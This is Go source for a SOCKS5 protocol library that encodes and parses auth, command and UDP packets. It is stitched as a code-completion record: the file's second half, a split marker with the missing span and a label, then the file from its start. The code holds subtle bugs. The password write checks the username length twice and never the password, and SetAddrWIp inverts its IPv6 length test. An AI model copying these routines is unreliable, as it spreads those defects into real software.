// 用户自定义范围 0x09- 0xFF
// 自定义,内部错误
Socks5CmdReplyInternalError Socks5CmdType = 0x010
)
// socks 5 cmd 命令 Atyp 类型
type Socks5AtypType byte
const (
//内部使用,根据 cmd.host、cmd.Ip 内容自动确定 atyp 值
Socks5CmdAtypTypeAuto Socks5AtypType = 0x00
Socks5CmdAtypTypeIP4 Socks5AtypType = 0x01
Socks5CmdAtypTypeDomain Socks5AtypType = 0x03
Socks5CmdAtypTypeIP6 Socks5AtypType = 0x04
)
type Socks5AuthPasswordRStatusType byte
const (
// 用户名、密码正确
Socks5AuthPasswordRStatusTypeSucceeded Socks5AuthPasswordRStatusType = 0x00
// 用户名、密码错误
Socks5AuthPasswordRStatusTypeErr Socks5AuthPasswordRStatusType = 0x01
)
// 鉴定请求
type Socks5AuthPack struct {
Ver byte // 版本5
Methods []Socks5AuthMethodType
}
// 鉴定回应
type Socks5AuthRPack struct {
Ver byte // 版本 5
Method Socks5AuthMethodType
}
// 命令及回应
type Socks5CmdPack struct {
Ver byte // 版本 5
Cmd Socks5CmdType
Rsv byte
Atyp Socks5AtypType
Host []byte
Port uint16
}
// 用户名、密码
type Socks5AuthPasswordPack struct {
Ver byte //目前版本为 1
Username string
Password string
}
type Socks5AuthPasswordRPack struct {
Ver byte //目前版本为 1
Status Socks5AuthPasswordRStatusType // 0 成功 1失败
}
func (auth *Socks5AuthPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
b := buf[:2]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth head, %v", err)
}
auth.Ver = b[0]
nmethods := b[1]
if auth.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", auth.Ver)
}
b = buf[:uint8(nmethods)]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth methods, %v", err)
}
methods := make([]Socks5AuthMethodType, len(b))
for i := range methods {
methods[i] = Socks5AuthMethodType(b[i])
}
auth.Methods = methods
return nil
}
func (auth *Socks5AuthPack) HasMethod(m Socks5AuthMethodType) bool {
for _, v := range auth.Methods {
if v == m {
return true
}
}
return false
}
// 读取鉴定
// 注意,所有这种类型的操作都是阻塞的,需要自己设置超时机制
// 内部会检查协议版本等参数。
func ReadAuth(r io.Reader) (*Socks5AuthPack, error) {
auth := Socks5AuthPack{}
err := auth.Read(r)
if err != nil {
return nil, err
}
return &auth, nil
}
func (auth *Socks5AuthPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = 5
buf[1] = uint8(len(auth.Methods))
for _, v := range auth.Methods {
buf = append(buf, byte(v))
}
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write,%v", err)
}
return nil
}
func WriteAuth(w io.Writer, auth *Socks5AuthPack) error {
if auth == nil {
return fmt.Errorf("auth is nil")
}
return auth.Write(w)
}
func ReadSocks5AuthR(r | er) (*Socks5AuthRPack, error) {
ar := Socks5AuthRPack{}
err := ar.Read(r)
if err != nil {
return nil, err
}
return &ar, err
}
func (ar *Socks5AuthRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
ar.Ver = buf[0]
ar.Method = Socks5AuthMethodType(buf[1])
if ar.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", buf[0])
}
return nil
}
func WriteSocks5AuthR(w io.Writer, cmd *Socks5AuthRPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5AuthRPack) Write(w io.Writer) error {
if _, err := w.Write([]byte{cmd.Ver, byte(cmd.Method)}); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func WriteSocks5Cmd(w io.Writer, cmd *Socks5CmdPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5CmdPack) Write(w io.Writer) error {
hostSize := len(cmd.Host)
if cmd.Atyp == Socks5CmdAtypTypeDomain && hostSize > 255 {
return fmt.Errorf("domain %v is too long", cmd.Host)
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
port := [2]byte{0}
binary.BigEndian.PutUint16(port[:], cmd.Port)
buf[0] = cmd.Ver
buf[1] = byte(cmd.Cmd)
buf[2] = cmd.Rsv
buf[3] = byte(cmd.Atyp)
buf = buf[:4]
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
buf = append(buf, cmd.Host...)
case Socks5CmdAtypTypeDomain:
buf = append(buf, uint8(len(cmd.Host)))
buf = append(buf, []byte(cmd.Host)...)
default:
return fmt.Errorf("unknown atyp %v type", cmd.Atyp)
}
buf = append(buf, port[0], port[1])
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func ReadSocks5Cmd(r io.Reader) (*Socks5CmdPack, error) {
cmd := Socks5CmdPack{}
err := cmd.Read(r)
if err != nil {
return nil, err
}
return &cmd, nil
}
// 请确定 cmd.Host 指向的内容未被其他位置使用,本函数会复用 cmd.Host 空间
func (cmd *Socks5CmdPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:4]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 command head, %v", err)
}
cmd.Ver = buf[0]
cmd.Cmd = Socks5CmdType(buf[1])
cmd.Rsv = buf[2]
cmd.Atyp = Socks5AtypType(buf[3])
if cmd.Ver != 5 {
return fmt.Errorf("unexpected protocol version %v ", cmd.Ver)
}
/* 这个不应该由这里判断。
if cmd.Cmd != 0x01 && cmd.Cmd != 0x02 && cmd.Cmd != 0x03 {
return nil, fmt.Errorf("未知的命令,cmd:%v。", cmd.Cmd)
}*/
/*if cmd.atyp == Socks5CmdAtypTypeIP4 {
buf = buf[:net.IPv4len]
}else */
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4:
buf = buf[:net.IPv4len]
case Socks5CmdAtypTypeIP6:
buf = buf[:net.IPv6len]
case Socks5CmdAtypTypeDomain:
buf = buf[:1]
default:
return fmt.Errorf("unexpected address type %v", cmd.Atyp)
}
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
cmd.Host = append(cmd.Host[:0], buf...)
case Socks5CmdAtypTypeDomain:
buf = buf[:buf[0]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
cmd.Host = append(cmd.Host, buf...)
}
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Port, %v", err)
}
cmd.Port = binary.BigEndian.Uint16(buf)
return nil
}
func (s *Socks5CmdPack) GetHostString() (string, error) {
switch s.Atyp {
case Socks5CmdAtypTypeIP4:
ip := net.IP(s.Host)
ip = ip.To4()
if len(ip) != net.IPv4len {
return "", fmt.Errorf("%v is not ipv4 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeIP6:
ip := net.IP(s.Host)
ip = ip.To16()
if len(ip) != net.IPv6len {
return "", fmt.Errorf("%v is not ipv6 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeDomain:
return string(s.Host), nil
default:
return "", fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) GetAddrString() (string, error) {
host, err := s.GetHostString()
if err != nil {
return "", err
}
return net.JoinHostPort(host, strconv.Itoa(int(s.Port))), nil
}
func (s *Socks5CmdPack) SetAddrAuto(addr string) error {
host, portStr, err := net.SplitHostPort(addr)
if err != nil {
return err
}
port, err := strconv.Atoi(portStr)
if err != nil {
return err
}
if port < 0 || port > 0xFFFF {
return fmt.Errorf("port %v < 0 || port %v > 0xFFFF", port, port)
}
s.SetHostAuto(host)
s.Port = uint16(port)
return nil
}
func (s *Socks5CmdPack) GetHostIp() (net.IP, error) {
var ip net.IP
switch s.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
ip = net.IP(s.Host)
return ip, nil
case Socks5CmdAtypTypeDomain:
ip = net.ParseIP(string(s.Host))
if len(ip) == 0 {
return nil, fmt.Errorf("%v is not ip address", s.Host)
}
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
return ipv4, nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
return ipv6, nil
}
return nil, fmt.Errorf("%v is not ipv4 or ipv6 address", s.Host)
default:
return nil, fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) SetHostAuto(v string) {
ip := net.ParseIP(v)
if len(ip) != 0 {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return
}
}
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(v)
return
}
func (s *Socks5CmdPack) SetHostDomain(domain string) {
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(domain)
}
func (s *Socks5CmdPack) SetHostIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return nil
}
return fmt.Errorf("%v is not ipv4 or ipv6 address", ip)
}
func ReadSocks5AuthPassword(r io.Reader) (*Socks5AuthPasswordPack, error) {
p := Socks5AuthPasswordPack{}
err := p.Read(r)
if err != nil {
return nil, err
}
return &p, nil
}
func (p *Socks5AuthPasswordPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth head, %v", err)
}
p.Ver = buf[0]
l := buf[1]
if p.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", p.Ver)
}
buf = buf[:l+1]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Username, %v", err)
}
p.Username = string(buf[:len(buf)-1])
buf = buf[:buf[len(buf)-1]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Password, %v", err)
}
p.Password = string(buf)
return nil
}
func WriteSocks5AuthPassword(w io.Writer, pass *Socks5AuthPasswordPack) error {
if pass == nil {
return fmt.Errorf("pass is nil")
}
return pass.Write(w)
}
func (pass *Socks5AuthPasswordPack) Write(w io.Writer) error {
if len(pass.Username) > 0xFF || len(pass.Username) > 0xFF {
return fmt.Errorf("username or password is too long")
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = pass.Ver
buf[1] = uint8(len(pass.Username))
buf = append(buf, []byte(pass.Username)...)
buf = append(buf, uint8(len(pass.Password)))
buf = append(buf, pass.Password...)
if _, err := w.Write(buf); err != nil {
return err
}
return nil
}
func ReadSocks5AuthPasswordR(r io.Reader) (*Socks5AuthPasswordRPack, error) {
pr := Socks5AuthPasswordRPack{}
err := pr.Read(r)
if err != nil {
return nil, err
}
return &pr, nil
}
func (pr *Socks5AuthPasswordRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
pr.Ver = buf[0]
pr.Status = Socks5AuthPasswordRStatusType(buf[1])
if pr.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", pr.Ver)
}
return nil
}
func WriteSocks5AuthPasswordR(w io.Writer, r *Socks5AuthPasswordRPack) error {
if r == nil {
return fmt.Errorf("r is nil")
}
return r.Write(w)
}
func (r *Socks5AuthPasswordRPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = r.Ver
buf[1] = byte(r.Status)
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
type Socks5UdpPack struct {
Rsv uint16
FRAG byte
ATYP Socks5AtypType
Host string
Ip net.IP
Port uint16
Data []byte
}
func (p *Socks5UdpPack) Parse(data []byte) error {
if len(data) < 11 {
return fmt.Errorf("data length is too short")
}
rsv := binary.BigEndian.Uint16(data)
frag := data[2]
atyp := Socks5AtypType(data[3])
ip := p.Ip[:0]
host := ""
portData := data
switch Socks5AtypType(atyp) {
case Socks5CmdAtypTypeIP4:
ip = append(ip, data[4:4+net.IPv4len]...)
portData = data[4+net.IPv4len:]
case Socks5CmdAtypTypeIP6:
if len(data) < 23 {
return fmt.Errorf("data length is too short")
}
ip = append(ip, data[4:4+net.IPv6len]...)
portData = data[4+net.IPv6len:]
case Socks5CmdAtypTypeDomain:
l := int(data[4])
if len(data) < 7+l {
return fmt.Errorf("data length is too short")
}
host = string(data[5 : 5+l])
portData = data[5+l:]
default:
return fmt.Errorf("unexpected atyp %v", atyp)
}
*p = Socks5UdpPack{}
port := binary.BigEndian.Uint16(portData[:2])
udpData := portData[2:]
p.Rsv = rsv
p.FRAG = frag
p.ATYP = atyp
p.Host = host
p.Ip = append(p.Ip[:0], ip...)
p.Port = port
p.Data = append(p.Data[:0], udpData...)
return nil
}
func (p *Socks5UdpPack) To(data []byte) (int, error) {
atyp := Socks5AtypType(p.ATYP)
ip := p.Ip
host := []byte(p.Host)
hostSize := 0
port := p.Port
if atyp == Socks5CmdAtypTypeAuto {
if len(ip) == 0 {
ip = net.ParseIP(p.Host)
}
if len(ip) == 0 {
atyp = Socks5CmdAtypTypeDomain
} else {
if ipv4 := ip.To4(); len(ipv4) == net.IPv4len {
ip = ipv4
}
switch len(ip) {
case net.IPv4len:
atyp = Socks5CmdAtypTypeIP4
ip = ip
case net.IPv6len:
atyp = Socks5CmdAtypTypeIP6
default:
return 0, fmt.Errorf("ip %v length is incorrect", ip)
}
}
}
switch atyp {
case Socks5CmdAtypTypeIP4:
ip = ip.To4()
if len(ip) != net.IPv4len {
return 0, fmt.Errorf("ipv4 %v length is incorrect", ip)
}
hostSize = net.IPv4len
case Socks5CmdAtypTypeIP6:
if len(ip) != net.IPv6len {
return 0, fmt.Errorf("ipv6 %v length is incorrect", ip)
}
hostSize = net.IPv6len
case Socks5CmdAtypTypeDomain:
if len(host) > 0xFF {
return 0, fmt.Errorf("host %v is too long", host)
}
hostSize = len(host) + 1
default:
return 0, fmt.Errorf("unexpected atyp %v", atyp)
}
mustSize := 6 + hostSize + len(p.Data)
if len(data) < mustSize {
return mustSize, fmt.Errorf("not enough space")
}
binary.BigEndian.PutUint16(data, p.Rsv)
data[2] = p.FRAG
data[3] = byte(atyp)
switch atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
copy(data[4:4+hostSize], ip)
case Socks5CmdAtypTypeDomain:
data[4] = byte(len(host))
copy(data[4+1:4+hostSize], host)
}
binary.BigEndian.PutUint16(data[4+hostSize:], port)
copy(data[4+hostSize+2:], p.Data)
return mustSize, nil
}
func (p *Socks5UdpPack) SetAddr(addr net.Addr) error {
udpAddr, _ := addr.(*net.UDPAddr)
if udpAddr == nil {
return fmt.Errorf("非预期的 udpAddr 格式, %v", addr)
}
err := p.SetAddrWIp(udpAddr.IP)
if err != nil {
return fmt.Errorf("SetAddrWIp,%v", err)
}
p.SetAddrWPort(udpAddr.Port)
return nil
}
func (p *Socks5UdpPack) SetAddrWIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
p.Ip = ipv4
p.ATYP = Socks5CmdAtypTypeIP4
return nil
}
ipv6 := ip.To16()
if len(ipv6) != net.IPv6len {
p.Ip = ipv6
p.ATYP = Socks5CmdAtypTypeIP6
return nil
}
return fmt.Errorf("非预期的 ip 版本,%v", ip)
}
func (p *Socks5UdpPack) SetAddrWPort(port int) {
p.Port = uint16(port)
}
func (p *Socks5UdpPack) GetUdpAddr() (*net.UDPAddr, error) {
switch p.ATYP {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
return &net.UDPAddr{
IP: p.Ip,
Port: int(p.Port),
Zone: "",
}, nil
default:
return nil, fmt.Errorf("非预期的地址类型")
}
}
| io.Read | identifier_name |
socks5.go | package socks5
import (
"encoding/binary"
"fmt"
"io"
"net"
"strconv"
"github.com/gamexg/proxylib/mempool"
)
// socks5 版本号
const Socks5Version byte = 0x05
// socks5 鉴定方式
// 无需鉴定 和 用户名密码鉴定
type Socks5AuthMethodType byte
const (
Socks5AuthMethodTypeNone Socks5AuthMethodType = 0x00
Socks5AuthMethodTypePassword Socks5AuthMethodType = 0x02
// 当服务端不支持客户端的鉴定方式时,返回这个类型
// 客户端需要立刻关闭连接
Socks5AuthMethodTypeErr Socks5AuthMethodType = 0xFF
)
// socks5 请求类型 ,socks5 cmd 状态回复
// socks5 请求类型有:tcp 传出连接、 tcp 传入连接 或 udp 连接
// socks5 回复状态有: 成功、一般性失败、规则不允许转发、主机不可达、atyp不支持、cmd命令不支持 等
type Socks5CmdType byte
const (
Socks5CmdTypeConnect Socks5CmdType = 0x01
Socks5CmdTypeBind Socks5CmdType = 0x02
Socks5CmdTypeUdpAssociate Socks5CmdType = 0x3
// cmd 回复,成功
Socks5CmdReplySucceeded Socks5CmdType = 0x00
// cmd 回复,普通SOCKS服务器连接失败
Socks5CmdReplyGeneralSocksServerFailure Socks5CmdType = 0x01
// cmd 回复,规则不允许
Socks5CmdReplyConnectionNotAllowedByRuleset Socks5CmdType = 0x02
// cmd 回复,网络不可达
Socks5CmdReplyNetworkUnreachable Socks5CmdType = 0x03
// cmd 回复,主机不可达
Socks5CmdReplyHostUnreachable Socks5CmdType = 0x04
// cmd 回复,连接被拒绝
Socks5CmdReplyConnectionRefused Socks5CmdType = 0x05
// cmd 回复,ttl超时
Socks5CmdReplyTtlExpired Socks5CmdType = 0x06
// cmd 回复,不支持的命令
Socks5CmdReplyCommandNotSupported Socks5CmdType = 0x07
// cmd 回复,不支持的地址类型
Socks5CmdReplyAddressTypeNotSupported Socks5CmdType = 0x08
// 用户自定义范围 0x09- 0xFF
// 自定义,内部错误
Socks5CmdReplyInternalError Socks5CmdType = 0x010
)
// socks 5 cmd 命令 Atyp 类型
type Socks5AtypType byte
const (
//内部使用,根据 cmd.host、cmd.Ip 内容自动确定 atyp 值
Socks5CmdAtypTypeAuto Socks5AtypType = 0x00
Socks5CmdAtypTypeIP4 Socks5AtypType = 0x01
Socks5CmdAtypTypeDomain Socks5AtypType = 0x03
Socks5CmdAtypTypeIP6 Socks5AtypType = 0x04
)
type Socks5AuthPasswordRStatusType byte
const (
// 用户名、密码正确
Socks5AuthPasswordRStatusTypeSucceeded Socks5AuthPasswordRStatusType = 0x00
// 用户名、密码错误
Socks5AuthPasswordRStatusTypeErr Socks5AuthPasswordRStatusType = 0x01
)
// 鉴定请求
type Socks5AuthPack struct {
Ver byte // 版本5
Methods []Socks5AuthMethodType
}
// 鉴定回应
type Socks5AuthRPack struct {
Ver byte // 版本 5
Method Socks5AuthMethodType
}
// 命令及回应
type Socks5CmdPack struct {
Ver byte // 版本 5
Cmd Socks5CmdType
Rsv byte
Atyp Socks5AtypType
Host []byte
Port uint16
}
// 用户名、密码
type Socks5AuthPasswordPack struct {
Ver byte //目前版本为 1
Username string
Password string
}
type Socks5AuthPasswordRPack struct {
Ver byte //目前版本为 1
Status Socks5AuthPasswordRStatusType // 0 成功 1失败
}
func (auth *Socks5AuthPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
b := buf[:2]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth head, %v", err)
}
auth.Ver = b[0]
nmethods := b[1]
if auth.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", auth.Ver)
}
b = buf[:uint8(nmethods)]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth methods, %v", err)
}
methods := make([]Socks5AuthMethodType, len(b))
for i := range methods {
methods[i] = Socks5AuthMethodType(b[i])
}
auth.Methods = methods
return nil
}
func (auth *Socks5AuthPack) HasMethod(m Socks5AuthMethodType) bool {
for _, v := range auth.Methods {
if v == m {
return true
}
}
return false
}
// 读取鉴定
// 注意,所有这种类型的操作都是阻塞的,需要自己设置超时机制
// 内部会检查协议版本等参数。
func ReadAuth(r io.Reader) (*Socks5AuthPack, error) {
auth := Socks5AuthPack{}
err := auth.Read(r)
if err != nil {
return nil, err
}
return &auth, nil
}
func (auth *Socks5AuthPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = 5
buf[1] = uint8(len(auth.Methods))
for _, v := range auth.Methods {
buf = append(buf, byte(v))
}
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write,%v", err)
}
return nil
}
func WriteAuth(w io.Writer, auth *Socks5AuthPack) error {
if auth == nil {
return fmt.Errorf("auth is nil")
}
return auth.Write(w)
}
func ReadSocks5AuthR(r io.Reader) (*Socks5AuthRPack, error) {
ar := Socks5AuthRPack{}
err := ar.Read(r)
if err != nil {
return nil, err
}
return &ar, err
}
func (ar *Socks5AuthRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
ar.Ver = buf[0]
ar.Method = Socks5AuthMethodType(buf[1])
if ar.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", buf[0])
}
return nil
}
func WriteSocks5AuthR(w io.Writer, cmd *Socks5AuthRPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5AuthRPack) Write(w io.Writer) error {
if _, err := w.Write([]byte{cmd.Ver, byte(cmd.Method)}); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func WriteSocks5Cmd(w io.Writer, cmd *Socks5CmdPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5CmdPack) Write(w io.Writer) error {
hostSize := len(cmd.Host)
if cmd.Atyp == Socks5CmdAtypTypeDomain && hostSize > 255 {
return fmt.Errorf("domain %v is too long", cmd.Host)
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
port := [2]byte{0}
binary.BigEndian.PutUint16(port[:], cmd.Port)
buf[0] = cmd.Ver
buf[1] = byte(cmd.Cmd)
buf[2] = cmd.Rsv
buf[3] = byte(cmd.Atyp)
buf = buf[:4]
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
buf = append(buf, cmd.Host...)
case Socks5CmdAtypTypeDomain:
buf = append(buf, uint8(len(cmd.Host)))
buf = append(buf, []byte(cmd.Host)...)
default:
return fmt.Errorf("unknown atyp %v type", cmd.Atyp)
}
buf = append(buf, port[0], port[1])
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func ReadSocks5Cmd(r io.Reader) (*Socks5CmdPack, error) {
cmd := Socks5CmdPack{}
err := cmd.Read(r)
if err != nil {
return nil, err
}
return &cmd, nil
}
// 请确定 cmd.Host 指向的内容未被其他位置使用,本函数会复用 cmd.Host 空间
func (cmd *Socks5CmdPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:4]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 command head, %v", err)
}
cmd.Ver = buf[0]
cmd.Cmd = Socks5CmdType(buf[1])
cmd.Rsv = buf[2]
cmd.Atyp = Socks5AtypType(buf[3])
if cmd.Ver != 5 {
return fmt.Errorf("unexpected protocol version %v ", cmd.Ver)
}
/* 这个不应该由这里判断。
if cmd.Cmd != 0x01 && cmd.Cmd != 0x02 && cmd.Cmd != 0x03 {
return nil, fmt.Errorf("未知的命令,cmd:%v。", cmd.Cmd)
}*/
/*if cmd.atyp == Socks5CmdAtypTypeIP4 {
buf = buf[:net.IPv4len]
}else */
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4:
buf = buf[:net.IPv4len]
case Socks5CmdAtypTypeIP6:
buf = buf[:net.IPv6len]
case Socks5CmdAtypTypeDomain:
buf = buf[:1]
default:
return fmt.Errorf("unexpected address type %v", cmd.Atyp)
}
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
cmd.Host = append(cmd.Host[:0], buf...)
case Socks5CmdAtypTypeDomain:
buf = buf[:buf[0]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
cmd.Host = append(cmd.Host, buf...)
}
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Port, %v", err)
}
cmd.Port = binary.BigEndian.Uint16(buf)
return nil
}
func (s *Socks5CmdPack) GetHostString() (string, error) {
switch s.Atyp {
case Socks5CmdAtypTypeIP4:
ip := net.IP(s.Host)
ip = ip.To4()
if len(ip) != net.IPv4len {
return "", fmt.Errorf("%v is not ipv4 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeIP6:
ip := net.IP(s.Host)
ip = ip.To16()
if len(ip) != net.IPv6len {
return "", fmt.Errorf("%v is not ipv6 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeDomain:
return string(s.Host), nil
default:
return "", fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) GetAddrString() (string, error) {
host, err := s.GetHostString()
if err != nil {
return "", err
}
return net.JoinHostPort(host, strconv.Itoa(int(s.Port))), nil
}
func (s *Socks5CmdPack) SetAddrAuto(addr string) error {
host, portStr, err := net.SplitHostPort(addr)
if err != nil {
return err
}
port, err := strconv.Atoi(portStr)
if err != nil {
return err
}
if port < 0 || port > 0xFFFF {
return fmt.Errorf("port %v < 0 || port %v > 0xFFFF", port, port)
}
s.SetHostAuto(host)
s.Port = uint16(port)
return nil
}
func (s *Socks5CmdPack) GetHostIp() (net.IP, error) {
var ip net.IP
switch s.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
ip = net.IP(s.Host)
return ip, nil
case Socks5CmdAtypTypeDomain:
ip = net.ParseIP(string(s.Host))
if len(ip) == 0 {
return nil, fmt.Errorf("%v is not ip address", s.Host)
}
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
return ipv4, nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
return ipv6, nil
}
return nil, fmt.Errorf("%v is not ipv4 or ipv6 address", s.Host)
default:
return nil, fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) SetHostAuto(v string) {
ip := net.ParseIP(v)
if len(ip) != 0 {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return
}
}
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(v)
return
}
func (s *Socks5CmdPack) SetHostDomain(domain string) {
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(domain)
}
func (s *Socks5CmdPack) SetHostIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return nil
}
return fmt.Errorf("%v is not ipv4 or ipv6 address", ip)
}
func ReadSocks5AuthPassword(r io.Reader) (*Socks5AuthPasswordPack, error) {
p := Socks5AuthPasswordPack{}
err := p.Read(r)
if err != nil {
return nil, err
}
return &p, nil
}
func (p *Socks5AuthPasswordPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth head, %v", err)
}
p.Ver = buf[0]
l := buf[1]
if p.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", p.Ver)
}
buf = buf[:l+1]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Username, %v", err)
}
p.Username = string(buf[:len(buf)-1])
buf = buf[:buf[len(buf)-1]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Password, %v", err)
}
p.Password = string(buf)
return nil
}
func WriteSocks5AuthPassword(w io.Writer, pass *Socks5AuthPasswordPack) error {
if pass == nil {
return fmt.Errorf("pass is nil")
}
return pass.Write(w)
}
func (pass *Socks5AuthPasswordPack) Write(w io.Writer) error {
if len(pass.Username) > 0xFF || len(pass.Username) > 0xFF {
return fmt.Errorf("username or password is too long")
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = pass.Ver
buf[1] = uint8(len(pass.Username))
buf = append(buf, []byte(pass.Username)...)
buf = append(buf, uint8(len(pass.Password)))
buf = append(buf, pass.Password...)
if _, err := w.Write(buf); err != nil {
return err
}
return nil
}
